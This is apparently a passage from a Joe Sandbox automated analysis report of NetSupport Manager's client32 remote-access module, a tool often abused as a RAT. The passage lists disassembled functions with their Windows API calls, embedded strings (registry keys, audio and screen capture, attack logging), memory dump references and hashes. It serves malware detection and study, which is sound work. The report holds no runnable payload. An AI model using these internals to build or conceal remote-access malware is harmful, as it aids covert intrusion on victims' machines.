                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$EnvironmentExpandStrings
                                                                                • String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
                                                                                • API String ID: 2608976442-3241390832
                                                                                • Opcode ID: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                • Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
                                                                                • Opcode Fuzzy Hash: 2a903cac9ea3e90876404fd3443ab57c65843769289415fd435a4d2424e95264
                                                                                • Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2
                                                                                APIs
                                                                                • SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
                                                                                • SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
                                                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 1113B8FB
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
                                                                                • String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
                                                                                • API String ID: 3054845645-718119679
                                                                                • Opcode ID: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                • Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
                                                                                • Opcode Fuzzy Hash: 6efe753ee26842de22518b522e7ef95a7534501bb52dc1f92809c48ca1fd7538
                                                                                • Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • wsprintfA.USER32 ref: 110EB5D8
                                                                                • GetTickCount.KERNEL32 ref: 110EB632
                                                                                • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB646
                                                                                • GetTickCount.KERNEL32 ref: 110EB64E
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
                                                                                • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
                                                                                • SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 110EB6DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                • API String ID: 3451743168-2289091950
                                                                                • Opcode ID: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                • Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
                                                                                • Opcode Fuzzy Hash: ead4b02f65febedee58ec954df4c387db7c39c25c30fbfeabe7c28379be18f45
                                                                                • Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,0000044D), ref: 110398CC
                                                                                • IsWindowVisible.USER32(00000000), ref: 110398CF
                                                                                • GetDlgItem.USER32(?,0000044F), ref: 110398F8
                                                                                • IsWindowVisible.USER32(00000000), ref: 110398FB
                                                                                • GetDlgItem.USER32(?,000004BE), ref: 11039928
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103992B
                                                                                • GetDlgItem.USER32(?,000017EC), ref: 11039958
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103995B
                                                                                • GetDlgItem.USER32(?,0000048D), ref: 11039988
                                                                                • IsWindowVisible.USER32(00000000), ref: 1103998B
                                                                                • GetDlgItem.USER32(?,0000048E), ref: 110399B8
                                                                                • IsWindowVisible.USER32(00000000), ref: 110399BB
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 11039A02
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 11039A06
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ItemWindow$Visible$EnableErrorExitLastMessageProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                • API String ID: 2531669725-1986719024
                                                                                • Opcode ID: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                • Instruction ID: c605c523e88007737b9d27236d90d9a53477605ae0cc304b47ea9e042cf8b0eb
                                                                                • Opcode Fuzzy Hash: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
                                                                                • Instruction Fuzzy Hash: EA4195757407056FF624DAA9CD81F1AB7DAABC8B40F208518F769DB3C0EEB0E8408758
                                                                                APIs
                                                                                  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • GetDlgItem.USER32(00000000,00000001), ref: 1103944A
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 1103944F
                                                                                • _calloc.LIBCMT ref: 1103945C
                                                                                • GetSystemMenu.USER32(?,00000000), ref: 11039490
                                                                                • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103949E
                                                                                • GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
                                                                                • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
                                                                                • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
                                                                                • UpdateWindow.USER32(00000000), ref: 11039567
                                                                                • BringWindowToTop.USER32(?), ref: 1103956E
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE
                                                                                • MessageBeep.USER32(000000FF), ref: 1103957F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Item$EnableMenuMessage$BeepBringErrorExitForegroundLastObjectProcessRectShowSystemTextUpdate_callocwsprintf
                                                                                • String ID: CLTCONN.CPP$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_nc
                                                                                • API String ID: 4191401721-1182766118
                                                                                • Opcode ID: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                • Instruction ID: fea8d420f6ab3010a63bc2930e21c2de0d8b75aa48f279369a9769ea0f724755
                                                                                • Opcode Fuzzy Hash: 51b6937d982a358fdf259d5baecad387e1d1d56d4f23d55ad49fb18189202900
                                                                                • Instruction Fuzzy Hash: 0C411AB9B803157BE7209761DC87F9AF398AB84B1CF104434F3267B6C0EAB5B4408759
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(111F3420,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
                                                                                • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
                                                                                • RegisterClassExA.USER32(?), ref: 110CB4F2
                                                                                • _memset.LIBCMT ref: 110CB51B
                                                                                • GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
                                                                                • RegisterClassExA.USER32(?), ref: 110CB58C
                                                                                • LeaveCriticalSection.KERNEL32(111F3420,0000000E), ref: 110CB5B5
                                                                                • LeaveCriticalSection.KERNEL32(111F3420,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB
                                                                                  • Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
                                                                                • String ID: AtlAxWin100$AtlAxWinLic100$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                • API String ID: 2220097787-1587594278
                                                                                • Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                • Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
                                                                                • Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
                                                                                • Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4
                                                                                APIs
                                                                                • GetSysColor.USER32(00000004), ref: 11003691
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
                                                                                  • Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
                                                                                  • Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 110036A5
                                                                                • GetStockObject.GDI32(00000007), ref: 110036B0
                                                                                • SelectObject.GDI32(?,00000000), ref: 110036BB
                                                                                • SelectObject.GDI32(?,?), ref: 110036CC
                                                                                • GetSysColor.USER32(00000010), ref: 110036DC
                                                                                • GetSysColor.USER32(00000010), ref: 110036F3
                                                                                • GetSysColor.USER32(00000014), ref: 1100370A
                                                                                • GetSysColor.USER32(00000014), ref: 11003721
                                                                                • GetSysColor.USER32(00000014), ref: 1100373E
                                                                                • GetSysColor.USER32(00000014), ref: 11003755
                                                                                • GetSysColor.USER32(00000010), ref: 1100376C
                                                                                • GetSysColor.USER32(00000010), ref: 11003783
                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 110037A0
                                                                                • Rectangle.GDI32(?,?,00000001,?,?), ref: 110037BA
                                                                                • SelectObject.GDI32(?,?), ref: 110037CE
                                                                                • SelectObject.GDI32(?,?), ref: 110037D8
                                                                                • DeleteObject.GDI32(?), ref: 110037DE
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
                                                                                • String ID:
                                                                                • API String ID: 3698065672-0
                                                                                • Opcode ID: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                • Instruction ID: a23acd2a2556d2351ec77cf4709ac6c6322e0be3c302c098e9beaf4924cedc1a
                                                                                • Opcode Fuzzy Hash: b833179956e3f332fb7c6e9edd2a8bf0286dfddfec6fc6f9ae6a9a20b302d007
                                                                                • Instruction Fuzzy Hash: 78515EB5900309AFE714DFA5CC85EBBF3BDEF98704F104A18E611A7691D670B944CBA1
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,FailedAttacks,00000001,FailedAttacks,00000000,80000002,Software\Productive Computer Insight\Client32,0002001F,00000000,00000000,?,?,?,1B702977,?,?), ref: 1104B8F6
                                                                                • _sprintf.LIBCMT ref: 1104B923
                                                                                  • Part of subcall function 110ED9F0: RegSetValueExA.ADVAPI32(00000002,?,00000000,?,00000001,00000003,?,?,?,?,11112835,authcode,?,00000001,authcode,000F003F), ref: 110EDA19
                                                                                • _strncpy.LIBCMT ref: 1104BACE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastLocalMessageProcessTimeValue_sprintf_strncpywsprintf
                                                                                • String ID: @ %s$%04d/%02d/%02d %02d:%02d:%02d$%s, %d$*** Warning. Failed Attack %u, from %s, at %s$FailedAttacks$Info. Connection Rejected, reason=%d$IsA()$LastAttack$LastAttacker$NC-$Software\Productive Computer Insight\Client32$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                • API String ID: 3341947355-3231647555
                                                                                • Opcode ID: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                • Instruction ID: fe029f2b4bd5101e4da145cc81d4ac0798fef8b5c75ba173e470820e68b704ff
                                                                                • Opcode Fuzzy Hash: c1a08ebd0c0cca2c53fd9c2065dee75976c60c6aa31f1c1f1af79d9370508339
                                                                                • Instruction Fuzzy Hash: 34916075E00219AFEB10CFA9CC84FEEFBB4EF45704F148199E549A7281EB716A44CB61
                                                                                APIs
                                                                                • _calloc.LIBCMT ref: 1104702F
                                                                                • wsprintfA.USER32 ref: 110470AE
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • wsprintfA.USER32 ref: 110470E9
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000014,00000080), ref: 11047203
                                                                                • _strrchr.LIBCMT ref: 1104720C
                                                                                • GetWindowsDirectoryA.KERNEL32(00000016,00000080), ref: 11047235
                                                                                • _free.LIBCMT ref: 11047251
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$DirectoryErrorExitFileLastMessageModuleNameProcessWindows_calloc_free_strrchr
                                                                                • String ID: %s %s$CLTCONN.CPP$NSA %s$NSS$V1.10$V12.00$V12.10$V12.10F20
                                                                                • API String ID: 1757445300-1785190265
                                                                                • Opcode ID: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                • Instruction ID: 26d4bceacdf9fffedd66530a5670ce95754bb6fc5caa385817b5218b2f2053ae
                                                                                • Opcode Fuzzy Hash: 24c3795b5edef53b19da24d8b2da5203a0cff33bf5a432e62935ac5c0fdc3eed
                                                                                • Instruction Fuzzy Hash: 3F619A78E00657ABD714CFB48CC1B6FF7E99F40308F1048A8ED5697641EA62F904C3A2
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • _malloc.LIBCMT ref: 1100B496
                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                  • Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,1B702977,?,00000000,00000000), ref: 1100AD54
                                                                                  • Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
                                                                                  • Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
                                                                                  • Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
                                                                                  • Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
                                                                                  • Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
                                                                                  • Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
                                                                                  • Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45
                                                                                • EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,1B702977,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
                                                                                • CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
                                                                                • _calloc.LIBCMT ref: 1100B519
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
                                                                                • LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
                                                                                • LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E
                                                                                Strings
                                                                                • DisableSounds, xrefs: 1100B472
                                                                                • Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
                                                                                • Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
                                                                                • \\.\NSAudioFilter, xrefs: 1100B4E0
                                                                                • InitCaptureSounds NT6, xrefs: 1100B5BE
                                                                                • Vista new pAudioCap=%p, xrefs: 1100B603
                                                                                • Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
                                                                                • Audio, xrefs: 1100B477
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                 • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                 • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
